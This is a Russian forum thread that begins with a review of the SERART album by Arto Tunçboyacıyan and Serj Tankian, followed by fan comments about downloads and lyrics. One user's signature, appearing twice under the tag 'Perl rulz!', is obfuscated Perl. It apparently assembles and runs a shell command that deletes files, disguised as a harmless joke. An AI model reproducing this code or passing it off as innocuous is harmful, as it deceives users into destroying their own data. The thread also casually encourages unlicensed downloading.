Когда сталкиваются музыкальные миры - рождается новая сфера богатого звука. В данном случае родился SERART - сотрудничество между Арто Танкбояджяном (Arto Tuncboyaciyan) (tunk-boy-a-jian) и Сержем Танкяном (Serj Tankian), которые нашли общее в армянских мотивах и страсти к звуковым исследованиям.
Родившийся в маленьком городке рядом с Константинополем (что в Турции), мультиинструмменталлист и авангардный фолк-исполнитель Арто Танкбояджян еще в Европе принял участие в записи более чем 200 альбомов, а затем поехал в Соединенные Штаты, чтобы работать с многочисленными джазовыми легендами, такими как Chet Baker, Al DiMeola и Joe Zawinul (и выступать с такими группами как Paul Winter и Earth Band). У Арто также есть своя собственная группа, которая называется Armenian Navy Band.
Любители рок-музыки знают Сержа Танкяна (Serj Tankian) как вокалиста группы System Of A Down. Их альбом Toxicity (на котором Серж был также со-продюссером), помимо прочих почестей, был назван журналом SPIN Magazine - альбомом года - по всему миру он был распродан в колличестве более 5 миллионов экземпляров. Кроме того, Серж является активистом социального правосудия и основателем, совместно с гитаристом Томом Морелло (Tom Morello) из Audioslave, политической организации Axis Of Justice.
Спродюссированный Сержем и Арто, SERART был первым альбомом который вышел на собственном лэйбле Сержа - Serjical Strike Records, который стал домом для новой смелой, оригинальной музыки. SERART смешивает ближневосточные мелодии и африканские ритмы, перемещаясь от классических мотивов до взрывных мелодий.
"Что мне нравится в этом проекте больше всего - говорит Серж.- это то, что всё было сделано на одном дыхании. Не было никаких особых размышлений на эту тему."
SERART является слиянием имен двух этих творцов, он объединил их в себе и открыл новое видение музыки. Эти двое, встретились после выступления Арто на Armenian Music Awards 2000-го года. Их знакомство вылилось в то что на альбоме Toxicity, Арто исполнил outro - скрытую песню, а позже превратилось в музыкальную дружбу и желание расширить грани привычного, смешивая культуры, и бросить вызов жанрам.
Альбом был записан в довольно свободной форме, родственной экспрессионистской живописи на холсте звука. "Для меня важно было доказать, что любовь находится вне национальности - говорит Арто. - Потому что тот факт, что все мы люди - намного важнее. И это касается каждого." "Национальность и религия - только приправа человеческого вкуса."
Яркое вступление "Cinema" очень удачно сочетает в себе барабаны и басовые удары с кричащим вокалом и джазовыми мотивами. "Love is the Peace" смешивает звуки войны (выстрелы и взрывы) с завывающим голосом Арто. Печальная баллада, "Leave Melody Counting Fear", совмещает игру на акустической гитаре и китайском инструментом вереницы (guchin) - наикрасивейшая вещь которую вы только слышали. Вы найдете клубные мотивы на "Save the Blonde" и социальные призывы Сержа на фоне тропического дождя в "Claustrophobia". Еще одна яркая композиция на альбоме - "Narina", в записи которой учавствовала певица Jenna Ross.
Добавлено: Вт Окт 17, 2006 12:30 am Заголовок сообщения:
я скачала всего 5 песен. так что объективно судить не могу.
но то что у меня есть оч нравицца _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
x-girl
ну пока нас за жопу полицаи не взяли качай скока душе угодно)) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
а я вроде как с этого сайта качала. тока там что-то накрылось.
если сейчас все в порядке, надо докачать _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)
Narina и Facing the plastic рулят!!! _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!
Да кстати а тексты Serart где нить скачать мона!? _________________ - Не подскажите сколько времени?
- Да конечно. Смотри, часовая стрелка показывает на "ПОШЕЛ", а минутная - "НАХУЙ"!
по словам армян поют не на армянском
по словам турков поют не на турецком
что на английском только часть - факт
делай вывод - никто не знает какой это язык, следовательно текстов нет _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
FUCK!!! SHIT!!! Хотелось бы до конца че там мямлит эта как ее ну певица которая еще в Narina c Arto поет! А также че там Серж про пластик поет! А ваще как переводиться Facing to Plastic!? _________________ - Не подскажите сколько времени?
Добавлено: Чт Фев 28, 2008 12:12 am Заголовок сообщения:
Hommie
Извините за офтоп,но мне этот парень безумно нравится.И хотя он не сказал ничего особенного,но гляда на его аватару я растекаюсь в жижу от избытка переполняющей меня нежности и тому подобных чувств.Я верю,что всё будет хорошо.Пиши побольше,я хочу радоваться снова и снова. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.